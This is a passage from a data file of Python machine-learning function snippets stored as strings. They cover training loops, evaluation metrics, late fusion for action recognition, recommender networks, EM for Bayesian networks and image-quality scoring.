'/home/syq/research_final/data/dense-traj/fv_hmdb51_python/'\n hmdb_splits = 'testTrainMulti_7030_splits/'\n categories = os.listdir(fv_root)\n weight = 1.0\n weights = [i / 20.0 for i in range(21)]\n acc_to_weights = {}\n\n for weight in weights:\n print \"Weight: %.2f\" % weight\n accs = np.zeros(3)\n for splitnum in range(1,4):\n ts = time.time()\n trainfiles, testfiles = hmdb51_splits.loadsplit(categories,\n hmdb_splits,\n splitnum)\n print 'Have %d train files' % len(trainfiles)\n print 'Have %d test files' % len(testfiles)\n\n if not vlen:\n fp = gzip.open(os.path.join(ob_root,'%s%s'%(trainfiles[0][0][:-4],\n ob_suffix)),\"rb\")\n vlen_ob = len(np.load(fp))\n fp.close()\n print \"OB vector length is %d\" % vlen_ob\n fp = gzip.open(os.path.join(fv_root,'%s%s'%(trainfiles[0][0][:-4],\n fv_suffix)),\"rb\")\n vlen_fv = len(np.load(fp))\n fp.close()\n print \"IDTFV vector length is %d\" % vlen_fv\n\n Dtrain_ob = np.zeros( (len(trainfiles),vlen_ob), np.float32 )\n Dtrain_fv = np.zeros( (len(trainfiles),vlen_fv), np.float32 )\n\n Ytrain = np.ones ( (len(trainfiles) )) * -1000\n\n for fi,f in enumerate(trainfiles):\n fp = gzip.open(os.path.join(ob_root,'%s%s'%(f[0][:-4],\n ob_suffix)),\"rb\")\n Dtrain_ob[fi][:] = np.load(fp)\n fp.close()\n Ytrain[fi] = f[1]\n\n fp = gzip.open(os.path.join(fv_root,'%s%s'%(f[0][:-4],\n fv_suffix)),\"rb\")\n Dtrain_fv[fi][:] = np.load(fp)\n fp.close()\n\n Dtest_ob = np.zeros( (len(testfiles),vlen_ob), np.float32 )\n Dtest_fv = np.zeros( 
(len(testfiles),vlen_fv), np.float32 )\n\n Ytest = np.ones ( (len(testfiles) )) * -1000\n\n for fi,f in enumerate(testfiles):\n fp = gzip.open(os.path.join(ob_root,'%s%s'%(f[0][:-4],\n ob_suffix)),\"rb\")\n Dtest_ob[fi][:] = np.load(fp)\n fp.close()\n Ytest[fi] = f[1]\n\n fp = gzip.open(os.path.join(fv_root,'%s%s'%(f[0][:-4],\n fv_suffix)),\"rb\")\n Dtest_fv[fi][:] = np.load(fp)\n fp.close()\n\n \"\"\"\n Early fusion\n Dtrain = np.hstack((Dtrain_ob, Dtrain_fv))\n Dtest = np.hstack((Dtest_ob, Dtest_fv))\n\n clf = OneVsRestClassifier(estimator=LinearSVC(C=100), n_jobs=8)\n acc = clf.fit(Dtrain, Ytrain).score(Dtest, Ytest)\n \"\"\"\n fv_clf = OneVsRestClassifier(estimator=LinearSVC(C=100), n_jobs=8)\n\n ob_clf = OneVsRestClassifier(estimator=SVC(C=10,\n cache_size=1000,\n kernel='linear',\n probability=True),\n n_jobs=-1)\n\n # Get probabilities for late fusion\n Dtrain_fv = fv_clf.fit(Dtrain_fv, Ytrain).decision_function(Dtrain_fv)\n Dtrain_ob = ob_clf.fit(Dtrain_ob, Ytrain).decision_function(Dtrain_ob)\n Dtest_fv = fv_clf.decision_function(Dtest_fv)\n Dtest_ob = ob_clf.decision_function(Dtest_ob)\n\n # Scale decision values b/w 0 and 1\n Dtrain_fv = preprocessing.normalize(Dtrain_fv)\n Dtrain_ob = preprocessing.normalize(Dtrain_ob)\n Dtest_fv = preprocessing.normalize(Dtest_fv)\n Dtest_ob = preprocessing.normalize(Dtest_ob)\n\n # Late fusion\n scores_train = (Dtrain_fv * weight) + (Dtrain_ob * (1 - weight))\n latefusion_clf = OneVsRestClassifier(estimator=LinearSVC(C=100), n_jobs=-1)\n latefusion_clf.fit(scores_train, Ytrain)\n\n scores_test = (Dtest_fv * weight) + (Dtest_ob * (1 - weight))\n acc = latefusion_clf.score(scores_test, Ytest)\n print 'Fold', splitnum, 'late fusion acc', acc\n print \"Train & testing time %.3f\" % (time.time() - ts)\n accs[splitnum-1] = acc\n acc_to_weights[weight] = accs\n\n print \"Mean accuracy: %.3f\" % accs.mean()\n with open(\"hmdb51_weight_gridsearch.txt\", \"w\") as f:\n for weight, accs in acc_to_weights.items():\n f.write(str(weight) + str(accs) + '\\n')\n return acc_to_weights\n\n \"\"\"\n with open('fv_hmdb51_accs.txt', 'w') as f:\n f.write(\"%s\\nMean:%.3f\" % (str(accs), np.mean(accs)))\n \"\"\"", "def test_pretrained():\n\n model = get_model()\n nums = generate_numbers()\n b = get_B(base=10, precision=[7, -9], size=1)[0]\n X = np.zeros((len(nums), 2 * len(b)))\n Y = np.zeros((len(nums), 1))\n\n for i, num in enumerate(nums):\n X[i] = encode(num, b)\n Y[i][0] = num\n\n loss = model.evaluate(x=X, y=Y)\n\n assert loss < 1e-5", "def computeNN(train, test):\n \n shallow_NN = test[['user_id', 'movie_id']].copy()\n deep_NN = test[['user_id', 'movie_id']].copy()\n \n categorical_train_y = np.zeros([train.shape[0], 5])\n categorical_train_y[np.arange(train.shape[0]), train.rating - 1] = 1\n\n\n categorical_test_y = np.zeros([test.shape[0], 5])\n categorical_test_y[np.arange(test.shape[0]), test.rating - 1] = 1\n \n n_items = 1000\n n_users = 10000\n \n \n def shallow_net():\n features = 48\n\n input_i = layers.Input(shape=[1])\n i = layers.Embedding(n_items + 1, features)(input_i)\n i = layers.Flatten()(i)\n i = layers.normalization.BatchNormalization()(i)\n\n input_u = layers.Input(shape=[1])\n u = layers.Embedding(n_users + 1, features)(input_u)\n u = layers.Flatten()(u)\n u = layers.normalization.BatchNormalization()(u)\n\n nn = layers.concatenate([i, u])\n\n nn = layers.Dense(512, activation='relu')(nn)\n nn = layers.Dropout(0.5)(nn)\n nn = layers.normalization.BatchNormalization()(nn)\n\n nn = layers.Dense(128, activation='relu')(nn)\n\n output = 
layers.Dense(5, activation='softmax')(nn)\n\n model = models.Model([input_i, input_u], output)\n model.compile(optimizer='adamax', loss='categorical_crossentropy')\n return model\n \n def deep_net():\n features = 48\n\n input_i = layers.Input(shape=[1])\n i = layers.Embedding(n_items + 1, features)(input_i)\n i = layers.Flatten()(i)\n i = layers.normalization.BatchNormalization()(i)\n\n input_u = layers.Input(shape=[1])\n u = layers.Embedding(n_users + 1, features)(input_u)\n u = layers.Flatten()(u)\n u = layers.normalization.BatchNormalization()(u)\n\n nn = layers.concatenate([i, u])\n\n nn = layers.Dense(1024, activation='relu')(nn)\n nn = layers.Dropout(0.5)(nn)\n nn = layers.normalization.BatchNormalization()(nn)\n nn = layers.Dense(512, activation='relu')(nn)\n nn = layers.Dropout(0.5)(nn)\n nn = layers.normalization.BatchNormalization()(nn)\n nn = layers.Dense(256, activation='relu')(nn)\n nn = layers.Dropout(0.5)(nn)\n nn = layers.normalization.BatchNormalization()(nn)\n nn = layers.Dense(128, activation='relu')(nn)\n\n output = layers.Dense(5, activation='softmax')(nn)\n\n model = models.Model([input_i, input_u], output)\n model.compile(optimizer='adamax', loss='categorical_crossentropy')\n\n return model\n\n model_deep = deep_net()\n model_shallow = shallow_net()\n print (\"Starting to compute shallow neural network...\")\n model_shallow.fit([train.movie_id, train.user_id], y=categorical_train_y, batch_size=20480, epochs=20)\n pred_shallow = model_shallow.predict([test.movie_id, test.user_id])\n print (\"... Finished sucessfully\")\n \n print (\"Starting to compute deep neural network...\")\n model_deep.fit([train.movie_id, train.user_id], y=categorical_train_y, batch_size=20480, epochs=20)\n pred_deep = model_deep.predict([test.movie_id, test.user_id])\n print (\"... 
Finished sucessfully\")\n \n \n shallow_NN['NN_shallow_rating'] = np.dot(pred_shallow,[1,2, 3, 4, 5])\n deep_NN['NN_deep_rating'] = np.dot(pred_deep,[1,2, 3, 4, 5])\n \n NN_rating = shallow_NN\\\n .merge(deep_NN, on=['user_id', 'movie_id'])\n \n return NN_rating", "def eval_epoch(self, epoch_num: int) -> float:\n epoch_loss = 0.0\n # hidden_start = torch.zeros(self.batch_size, self.rnn_size).to(device)\n with torch.no_grad():\n # for batch_num, (x, y) in enumerate(make_batches(self.dev_data,\n # self.batch_size,\n # self.max_len)):\n acc = 0;\n for batch_num, batch_tuple in enumerate(self.train_data):\n print('batch: ', batch_num)\n # reset gradients\n # self.optimizer.zero_grad()\n # x = len(batch_tuple[0])\n # y = len(batch_tuple[0][0])\n # batch x timesteps x hidden_size\n x, y = batch_tuple\n # x = x.to(self.device)\n # y = y.to(self.device)\n hidden_states = self.model(x)\n # batch x timesteps x vocab_size\n # logits = self.model.get_logits(hidden_states)\n\n batch_loss = self.model.get_loss(hidden_states, y)\n epoch_loss += batch_loss.item()\n hidden_states_m = torch.argmax(hidden_states, dim=1)\n acc += sum(hidden_states_m == y).item()\n # we use a stateful RNN, which means the first hidden state for\n # the next batch is the last hidden state of the current batch\n # hidden_states.detach_()\n # hidden_start = hidden_states[:,-1,:]\n\n epoch_loss /= (batch_num + 1)\n\n return epoch_loss, acc", "def _train_epoch(self, epoch: int) -> Dict[str, float]:\n logger.info(\"Epoch %d/%d\", epoch, self._num_epochs - 1)\n peak_cpu_usage = peak_memory_mb()\n logger.info(f\"Peak CPU memory usage MB: {peak_cpu_usage}\")\n gpu_usage = []\n for gpu, memory in gpu_memory_mb().items():\n gpu_usage.append((gpu, memory))\n logger.info(f\"GPU {gpu} memory usage MB: {memory}\")\n\n train_loss = 0.0\n # Set the model to \"train\" mode.\n self.model.train()\n\n num_gpus = len(self._cuda_devices)\n\n # Get tqdm for the training batches\n raw_train_generator = self.iterator(self.train_data,\n num_epochs=1,\n shuffle=self.shuffle)\n train_generator = lazy_groups_of(raw_train_generator, num_gpus)\n num_training_batches = math.ceil(self.iterator.get_num_batches(self.train_data)/num_gpus)\n self._last_log = time.time()\n last_save_time = time.time()\n\n batches_this_epoch = 0\n if self._batch_num_total is None:\n self._batch_num_total = 0\n\n histogram_parameters = set(self.model.get_parameters_for_histogram_tensorboard_logging())\n\n logger.info(\"Training\")\n train_generator_tqdm = Tqdm.tqdm(train_generator,\n total=num_training_batches)\n cumulative_batch_size = 0\n for batch_group in train_generator_tqdm:\n batches_this_epoch += 1\n self._batch_num_total += 1\n batch_num_total = self._batch_num_total\n\n self.optimizer.zero_grad()\n\n output_dict = self.get_output_dict(batch_group, for_training=True)\n loss = self.get_batch_loss(output_dict, for_training=True)\n\n if torch.isnan(loss):\n raise ValueError(\"nan loss encountered\")\n\n loss.backward()\n\n train_loss += loss.item()\n\n batch_grad_norm = self.rescale_gradients()\n\n # This does nothing if batch_num_total is None or you are using a\n # scheduler which doesn't update per batch.\n if self._learning_rate_scheduler:\n self._learning_rate_scheduler.step_batch(batch_num_total)\n if self._momentum_scheduler:\n self._momentum_scheduler.step_batch(batch_num_total)\n\n if self._tensorboard.should_log_histograms_this_batch():\n # get the magnitude of parameter updates for logging\n # We need a copy of current parameters to compute magnitude of updates,\n # 
and copy them to CPU so large models won't go OOM on the GPU.\n param_updates = {name: param.detach().cpu().clone()\n for name, param in self.model.named_parameters()}\n self.optimizer.step()\n for name, param in self.model.named_parameters():\n param_updates[name].sub_(param.detach().cpu())\n update_norm = torch.norm(param_updates[name].view(-1, ))\n param_norm = torch.norm(param.view(-1, )).cpu()\n self._tensorboard.add_train_scalar(\"gradient_update/\" + name,\n update_norm / (param_norm + 1e-7))\n else:\n self.optimizer.step()\n\n # Update moving averages\n if self._moving_average is not None:\n self._moving_average.apply(batch_num_total)\n\n # Update the description with the latest metrics\n metrics = training_util.get_metrics(self.model, train_loss, batches_this_epoch)\n description = training_util.description_from_metrics(metrics)\n\n train_generator_tqdm.set_description(description, refresh=False)\n\n # Log parameter values to Tensorboard\n if self._tensorboard.should_log_this_batch():\n self._tensorboard.log_parameter_and_gradient_statistics(self.model, batch_grad_norm)\n self._tensorboard.log_learning_rates(self.model, self.optimizer)\n\n self._tensorboard.add_train_scalar(\"loss/loss_train\", metrics[\"loss\"])\n self._tensorboard.log_metrics({\"epoch_metrics/\" + k: v for k, v in metrics.items()})\n\n if self.tensorboard_log_batch_callback:\n self.tensorboard_log_batch_callback(output_dict, self._tensorboard)\n\n if self._tensorboard.should_log_histograms_this_batch():\n self._tensorboard.log_histograms(self.model, histogram_parameters)\n\n if self._log_batch_size_period:\n cur_batch = sum([training_util.get_batch_size(batch) for batch in batch_group])\n cumulative_batch_size += cur_batch\n if (batches_this_epoch - 1) % self._log_batch_size_period == 0:\n average = cumulative_batch_size/batches_this_epoch\n logger.info(f\"current batch size: {cur_batch} mean batch size: {average}\")\n self._tensorboard.add_train_scalar(\"current_batch_size\", cur_batch)\n self._tensorboard.add_train_scalar(\"mean_batch_size\", average)\n\n # Save model if needed.\n if self._model_save_interval is not None and (\n time.time() - last_save_time > self._model_save_interval\n ):\n last_save_time = time.time()\n self._save_checkpoint(\n '{0}.{1}'.format(epoch, training_util.time_to_str(int(last_save_time)))\n )\n metrics = training_util.get_metrics(self.model, train_loss, batches_this_epoch, reset=True)\n metrics['cpu_memory_MB'] = peak_cpu_usage\n for (gpu_num, memory) in gpu_usage:\n metrics['gpu_'+str(gpu_num)+'_memory_MB'] = memory\n return metrics", "def learn(model: KW_Model,\n trainloader: DataLoader,\n testloader: DataLoader,\n optimizer: optim.Optimizer,\n nb_epoch: int,\n device: torch.device,\n eval_fn: Callable[[List[bool], List[Qid]], Dict[Qid, float]],\n mean_window: int = 50,\n entropy_lambda: float = 0.025,\n smt_lambda: float = 1.0,\n reinforce_lambda: float = 1.0,\n ) -> Tuple[nn.Module, Dict[str, List[torch.tensor]], Dict[str, List[torch.tensor]]]:\n print(\"Memory usage: %s (kb)\" % resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\n past_rewards = {str(q_id.long().item()): deque(maxlen=mean_window)\n for _, _, q_ids, _ in chain(trainloader, testloader)\n for q_id in q_ids}\n \n logs = [\"reward\",\n \"scaled_entropy\",\n \"scaled_reinforce\",\n \"scaled_smt\",\n \"total_loss\",\n \"accuracy\"]\n train_logs = {log: list() for log in logs}\n test_logs = {log: list() for log in logs}\n del logs\n \n for epoch in range(nb_epoch):\n running_loss, running_reward = [], []\n entropies, 
reinforces, smts = [], [], []\n nb_correct, nb_total = 0, 0\n print(f\"\\nEpoch {epoch}\")\n \n print(\"Begin epoch: %s (kb)\" % resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\n model.train()\n for x, y, q_id, masks in trainloader:\n x = x.to(device)\n y = y.to(device)\n masks = masks.to(device)\n\n # batch x seq , batch x seq , batch x seq\n sample, logits, entropy, params = model(x, masks)\n batch_reward, rewards = eval_fn(sample.detach().t().tolist(), q_id)\n losses = compute_losses(y, params, rewards, logits, past_rewards,\n entropy, entropy_lambda, reinforce_lambda, smt_lambda, device)\n\n # entropy_lambda = min(1.01*entropy_lambda, 0.025)\n # reinforce_lambda = min(1.01*reinforce_lambda, 1.0)\n # smt_lambda = max(0.99*smt_lambda, 0.05)\n loss, reinforce_loss, entropy, smt_loss = losses\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n temp = (sample.long() == y.detach().long()).float() * masks\n nb_correct += temp.byte().cpu().sum().tolist()\n nb_total += masks.cpu().sum().tolist()\n\n running_loss.append(loss.item())\n running_reward.extend(rewards.values())\n print(f\"\\rTr Loss {mean(running_loss): .3f} Rewa {mean(running_reward): .5f}\", end=\"\")\n \n reinforces.append(reinforce_loss.item())\n entropies.append(entropy.item())\n smts.append(smt_loss.item())\n\n # Logs\n train_logs[\"reward\"].append(mean(running_reward))\n train_logs[\"scaled_entropy\"].append(mean(entropies))\n train_logs[\"scaled_reinforce\"].append(mean(reinforces))\n train_logs[\"scaled_smt\"].append(mean(smts))\n train_logs[\"total_loss\"].append(mean(running_loss))\n train_logs[\"accuracy\"].append(nb_correct / nb_total)\n \n \n train_loss, train_reward = mean(running_loss), mean(running_reward)\n running_loss, running_reward = [], []\n entropies, reinforces, smts = [], [], []\n nb_correct, nb_total = 0, 0\n model.eval()\n for x, y, q_id, masks in testloader:\n x = x.to(device)\n y = y.to(device)\n masks = masks.to(device)\n\n # batch x seq , batch x seq , batch x seq\n sample, logits, entropy, params = model(x, masks)\n batch_reward, rewards = eval_fn(sample.detach().t().tolist(), q_id)\n\n losses = compute_losses(y, params, rewards, logits, past_rewards,\n entropy, entropy_lambda, reinforce_lambda, smt_lambda, device)\n loss, reinforce_loss, entropy, smt_loss = losses\n \n temp = (sample.long() == y.detach().long()).float() * masks\n nb_correct += temp.byte().sum().tolist()\n nb_total += masks.sum().tolist()\n\n running_loss.append(loss.item())\n running_reward.extend(rewards.values())\n print(f\"\\rTr Loss {train_loss: .3f} Rewa {train_reward: .3f}\",\n f\"Te Loss{mean(running_loss): .3f} Rewa {mean(running_reward): .3f}\",\n end=\"\")\n \n reinforces.append(reinforce_loss.item())\n entropies.append(entropy.item())\n smts.append(smt_loss.item())\n \n \n # Logs\n test_logs[\"reward\"].append(mean(running_reward))\n test_logs[\"scaled_entropy\"].append(mean(entropies))\n test_logs[\"scaled_reinforce\"].append(mean(reinforces))\n test_logs[\"scaled_smt\"].append(mean(smts))\n test_logs[\"total_loss\"].append(mean(running_loss))\n test_logs[\"accuracy\"].append(nb_correct / nb_total)\n \n\n return model, train_logs, test_logs", "def compute_stats(self, epoch, loader, setname):\n args = self.args\n self.model.eval()\n ndevbatches = len(self.dev_loader)\n logging.info(f\"Evaluating {ndevbatches} batches ...\")\n\n recons, gts = defaultdict(list), defaultdict(list)\n acquisition_machine_by_fname = dict()\n with torch.no_grad():\n for batch_idx, batch in enumerate(self.dev_loader):\n 
progress = epoch + batch_idx/ndevbatches\n logging_epoch = batch_idx % args.log_interval == 0\n logging_epoch_info = batch_idx % (2 * args.log_interval) == 0\n log = logging.info if logging_epoch_info else logging.debug\n\n self.start_of_test_batch_hook(progress, logging_epoch)\n\n batch = self.preprocess_data(batch)\n output, target = self.predict(batch)\n output = self.unnorm(output, batch)\n target = self.unnorm(target, batch)\n fname, slice = batch.fname, batch.slice\n\n for i in range(output.shape[0]):\n slice_cpu = slice[i].item()\n recons[fname[i]].append((slice_cpu, output[i].float().cpu().numpy()))\n gts[fname[i]].append((slice_cpu, target[i].float().cpu().numpy()))\n\n acquisition_type = batch.attrs_dict['acquisition'][i]\n machine_type = batch.attrs_dict['system'][i]\n acquisition_machine_by_fname[fname[i]] = machine_type + '_' + acquisition_type\n\n if logging_epoch or batch_idx == ndevbatches-1:\n gpu_memory_gb = torch.cuda.memory_allocated()/1000000000\n host_memory_gb = utils.host_memory_usage_in_gb()\n log(f\"Evaluated {batch_idx+1} of {ndevbatches} (GPU Mem: {gpu_memory_gb:2.3f}gb Host Mem: {gpu_memory_gb:2.3f}gb)\")\n sys.stdout.flush()\n\n if self.args.debug_epoch_stats:\n break\n del output, target, batch\n\n logging.debug(f\"Finished evaluating\")\n self.end_of_test_epoch_hook()\n\n recons = {\n fname: np.stack([pred for _, pred in sorted(slice_preds)])\n for fname, slice_preds in recons.items()\n }\n gts = {\n fname: np.stack([pred for _, pred in sorted(slice_preds)])\n for fname, slice_preds in gts.items()\n }\n\n nmse, psnr, ssims = [], [], []\n ssim_for_acquisition_machine = defaultdict(list)\n recon_keys = list(recons.keys()).copy()\n for fname in recon_keys:\n pred_or, gt_or = recons[fname].squeeze(1), gts[fname].squeeze(1)\n pred, gt = transforms.center_crop_to_smallest(pred_or, gt_or)\n del pred_or, gt_or\n\n ssim = evaluate.ssim(gt, pred)\n acquisition_machine = acquisition_machine_by_fname[fname]\n ssim_for_acquisition_machine[acquisition_machine].append(ssim)\n ssims.append(ssim)\n nmse.append(evaluate.nmse(gt, pred))\n psnr.append(evaluate.psnr(gt, pred))\n del gt, pred\n del recons[fname], gts[fname]\n\n if len(nmse) == 0:\n nmse.append(0)\n ssims.append(0)\n psnr.append(0)\n\n min_vol_ssim = np.argmin(ssims)\n min_vol = str(recon_keys[min_vol_ssim])\n logging.info(f\"Min vol ssims: {min_vol}\")\n sys.stdout.flush()\n\n del recons, gts\n\n acquisition_machine_losses = dict.fromkeys(self.dev_data.system_acquisitions, 0)\n for key, value in ssim_for_acquisition_machine.items():\n acquisition_machine_losses[key] = np.mean(value)\n\n losses = {'NMSE': np.mean(nmse),\n 'PSNR': np.mean(psnr),\n 'SSIM': np.mean(ssims),\n 'SSIM_var': np.var(ssims),\n 'SSIM_min': np.min(ssims),\n **acquisition_machine_losses}\n\n return losses", "def train_eval_rnd(self, train_data, test_data, rand_iter, train_labels, test_labels):\n np.random.seed(0)\n shuf_tr = [np.random.permutation(train_labels)\n for _ in range(rand_iter)]\n misclass_tr, misclass_ts = [], []\n for lab in shuf_tr:\n self.class_method.fit(train_data, lab)\n misclass_tr.append(zero_one_loss(lab, self.class_method.predict(train_data)))\n misclass_ts.append(zero_one_loss(test_labels,\n _kuhn_munkres_algorithm(test_labels,\n self.class_method.predict(test_data))))\n return np.mean(misclass_tr), np.mean(misclass_ts)\n # start = time.process_time()\n # np.random.seed(0)\n # shuf_tr, shuf_val = zip(*[list(map(lambda x: np.random.permutation(x),\n # [tr_labels, val_labels])) for _ in range(rand_iter)])\n # # 
print(f'Shuffle train:{shuf_tr}, Shuffle val:{shuf_val}')\n # # logging.info(f'Shuffle labels: {time.process_time()-start}s')\n # # part = time.process_time()\n # model_tr = [self.class_method.fit(train_data, lab) for lab in shuf_tr]\n # # print(f'Models:{model_tr}')\n # # logging.info(f'Train model: {time.process_time()-part}s')\n # # part = time.process_time()\n # misclass_tr = [zero_one_loss(x, y.predict(train_data)) for x, y in\n # zip(shuf_tr, model_tr)]\n # # print(f'Misclassification tr:{misclass_tr}')\n # # logging.info(f'Misclass TR: {time.process_time()-part}s')\n # # part = time.process_time()\n # misclass_val = [zero_one_loss(x, _kuhn_munkres_algorithm(x,\n # y.predict(val_data))) for x, y in\n # zip(shuf_val, model_tr)]\n # # print(f'Misclassification val:{misclass_val}')\n # # logging.info(f'Misclass VAL: {time.process_time()-part}s')\n # return np.mean(misclass_tr), np.mean(misclass_val)\n # misc_avg_tr, misc_avg_ts = [], []\n # append_tr = misc_avg_tr.append\n # append_ts = misc_avg_ts.append\n # for it in range(rand_iter):\n # np.random.seed(0)\n # np.random.shuffle(tr_labels)\n # np.random.seed(0)\n # np.random.shuffle(val_labels)\n # model_tr = self.class_method.fit(train_data, tr_labels)\n # misclass_tr = zero_one_loss(tr_labels,\n # self.class_method.predict(train_data))\n # misclass_ts = zero_one_loss(val_labels,\n # _kuhn_munkres_algorithm(val_labels,\n # model_tr.predict(val_data)))\n # append_tr(misclass_tr)\n # append_ts(misclass_ts)\n # return np.mean(misc_avg_tr), np.mean(misc_avg_ts)", "def init_bn(bn):\n \n bn.bias.data.fill_(0.)\n bn.running_mean.data.fill_(0.)\n bn.weight.data.fill_(1.)\n bn.running_var.data.fill_(1.)", "def train_em(self, vars, samples, max_iters, eps=1.0e-5):\n\t\t\n\t\tdef mul(a,b):\n\t\t\treturn a*b\n\t\tsamples_noweight = [cut(s,'Weight') for s in samples]\n\t\tsampleWeights = [s['Weight'] if 'Weight' in s else 1.0 for s in samples]\n\t\tparentVals = [self.variables[v].cpt.probTable.keys() for v in vars]\n\t\tvals = [self.variables[v].cpt.values() for v in vars]\n\t\toldll = sum([math.log(self.prob(s)) for s in samples_noweight])\n\t\tfor iter_c in range(max_iters):\n\t\t\tprint \"Iter\", iter_c\n\t\t\tparentDists = [[[self.enumerate_ask(p,s) \\\n\t\t\t\t\t\t\t\tfor p in self.variables[v].parents] \\\n\t\t\t\t\t\t\tfor v in vars]\n\t\t\t\t\t\tfor s in samples_noweight]\n\t\t\tvarDists = [[self.enumerate_ask(v,s) for v in vars] \\\n\t\t\t\t\tfor s in samples_noweight]\n\t\t\t\t\t\n\t\t\t# In theory a fast(er) way to do this, but consumes huge\n\t\t\t# amounts of memory quickly\n#\t\t\tparentCounts = [[[sampleWeights[i]*reduce(mul,\n#\t\t\t\t\t\t\t\t\t\t\t[parentDists[i][j][k][pv[k]] \\\n#\t\t\t\t\t\t\t\t\t\t\t\tfor k in range(len(pv))]) \\\n#\t\t\t\t\t\t\t\t\t\tfor i in range(len(samples))]\n#\t\t\t\t\t\t\t\t\tfor pv in parentVals[j]] \\\n#\t\t\t\t\t\t\t\tfor j,v in enumerate(vars)]\n#\t\t\tvalParentCounts = [[[[varDists[i][j][vv]*parentCounts[j][k][i] \\\n#\t\t\t\t\t\t\t\t\t\t\tfor i in range(len(samples))] \\\n#\t\t\t\t\t\t\t\t\t\tfor vv in vals[j]] \\\n#\t\t\t\t\t\t\t\t\tfor k in range(len(parentVals[j]))] \\\n#\t\t\t\t\t\t\t\tfor j,v in enumerate(vars)]\n\n\t\t\t# This seems to provide a good tradeoff between list-comprehension\n\t\t\t# speed and memory consumption (YMMV)\n\t\t\tfor j,v in enumerate(vars):\n\t\t\t\tfor h,pv in enumerate(parentVals[j]):\n\t\t\t\t\tpc = [sampleWeights[i]*reduce(mul, \n\t\t\t\t\t\t\t\t\t\t\t\t[parentDists[i][j][k][pv[k]] \\\n\t\t\t\t\t\t\t\t\t\t\t\t\tfor k in range(len(pv))]) \\\n\t\t\t\t\t\t\t\t\tfor i 
in range(len(samples))]\n\t\t\t\t\tvpc = [[varDists[i][j][vv]*pc[i] \\\n\t\t\t\t\t\t\t\t\t\tfor i in range(len(samples))] \\\n\t\t\t\t\t\t\t\t\tfor vv in vals[j]]\n\t\t\t\t\tpcSum = sum(pc)\n\t\t\t\t\tfor i in range(len(vals[j])):\n\t\t\t\t\t\tvpcSum = sum(vpc[i])\n\t\t\t\t\t\tself.variables[v].cpt.probTable[pv][i] = vpcSum / pcSum\n\t\t\t\n\t\t\tll = sum([math.log(self.prob(s)) for s in samples_noweight])\n\t\t\tif abs(ll-oldll) < eps:\n\t\t\t\treturn\n\t\t\toldll = ll", "def learn(self, Xtrain, ytrain):\n pass\n self.weights = np.zeros(Xtrain.shape[1],)\n\n ### YOUR CODE HERE\n \n lmbd = self.params['lamb']\n \n numsamples = Xtrain.shape[0]\n # Xless = Xtrain[:,self.params['features']]\n Xless = Xtrain\n self.weights = np.random.rand(Xless.shape[1])\n err = 10000;\n #cw =0;\n tolerance = 10*np.exp(-4)\n i=0;\n \n \n w1 = self.weights\n # cw_v =(np.dot(Xless, self.weights)-ytrain)\n #cw = (np.linalg.norm(cw_v)**2)/(2*numsamples)\n cw_v = np.dot(Xless, self.weights.T)\n cw = self.logit_cost(cw_v, Xless, ytrain) + lmbd * self.regularizer[0](self.weights)\n # print(cw)\n errors = []\n runtm = []\n epch = []\n \n err = 1\n iteration= 1000\n #tm= time.time()\n while (abs(cw-err)>tolerance) and (i <iteration):\n err = cw\n g = self.logit_cost_grad(cw_v, Xless, ytrain)\n obj = cw\n j=0\n ita = -1* self.params['stepsize']\n w = self.weights\n # w1 = np.add(w,np.dot(ita,g))\n while(j<iteration):\n w1 = np.add(w,np.dot(ita,g))\n # cw_v =(np.dot(Xless, w1)-ytrain)\n # cw = (np.linalg.norm(cw_v)**2)/(2*numsamples)\n cw_v = np.dot(Xless, w1.T)\n cw = self.logit_cost(cw_v, Xless, ytrain)+lmbd * self.regularizer[0](w1)\n ## print (cw)\n \n if(cw<np.absolute(obj-tolerance)): ############################################\n break\n ita = 0.7*ita\n j=j+1\n \n if(j==iteration):\n self.weights=w\n ita =0\n else:\n self.weights = w1\n \n # cw_v =(np.dot(Xless, self.weights)-ytrain)\n #cw = (np.linalg.norm(cw_v)**2)/(2*numsamples)\n cw_v = np.dot(Xless, self.weights.T)\n cw = self.logit_cost(cw_v, Xless, ytrain)\n #tm1 = time.time()-tm\n #runtm.append(tm1)\n #err = cw\n errors.append(err)\n i=i+1\n epch.append(i)", "def _check_PSNR(self, dataset, is_test=False):\n\n # process one image per iter for test phase\n if is_test:\n batch_size = 1\n else:\n batch_size = 1 # self.batch_size\n\n dataloader = DataLoader(dataset, batch_size=batch_size,\n shuffle=False, num_workers=1)\n\n avr_psnr = 0\n avr_ssim = 0\n\n # book keeping variables for test phase\n psnrs = [] # psnr for each image\n ssims = [] # ssim for each image\n proc_time = [] # processing time\n outputs = [] # output for each image\n names = []\n\n for batch, sample in enumerate(dataloader):\n input_batch, label_batch, name = sample['lr'], sample['hr'], sample['im_name']\n\n # Wrap with torch Variable\n input_batch, label_batch = self._wrap_variable(input_batch,\n label_batch,\n self.use_gpu)\n\n if is_test:\n start = time.time()\n if self.model_name in ['TDAN']:\n output_batch = chop_forward(input_batch, self.model, 4)\n #output_batch = chop_forward(input_batch, self.model, 4)\n #output_batch = forward_x8(input_batch, self.model).unsqueeze(0)\n #print(output_batch.size())\n # _, lrs = self.model(input_batch)\n # output_batch = lrs[:, -1, :, :, :]\n else:\n output_batch = self.model(input_batch)\n elapsed_time = time.time() - start\n else:\n if self.model_name in ['TDAN']:\n #output_batch, _ = self.model(input_batch)\n output_batch = chop_forward(input_batch, self.model, 4)\n else:\n output_batch = self.model(input_batch)\n # ssim is calculated with the 
normalize (range [0, 1]) image\n ssim = pytorch_ssim.ssim(output_batch + 0.5, label_batch + 0.5, size_average=False)\n ssim = torch.sum(ssim.data)\n avr_ssim += ssim\n\n # calculate PSRN\n output = output_batch.data\n label = label_batch.data\n\n output = (output + 0.5) * 255\n label = (label + 0.5) * 255\n\n output = quantize(output, 255)\n label = quantize(label, 255)\n # diff = input - target\n\n output = output.squeeze(dim=0)\n label = label.squeeze(dim=0)\n\n psnr = self._comput_PSNR(output / 255.0, label / 255.0)\n # print(psnr)\n avr_psnr += psnr\n\n # save psnrs and outputs for statistics and generate image at test time\n if is_test:\n psnrs.append(psnr)\n ssims.append(ssim)\n proc_time.append(elapsed_time)\n np_output = output.cpu().numpy()\n outputs.append(np_output)\n names.append(name)\n\n epoch_size = len(dataset)\n avr_psnr /= epoch_size\n avr_ssim /= epoch_size\n stats = (psnrs, ssims, proc_time)\n\n return avr_psnr, avr_ssim, stats, outputs, names", "def train(self):\n 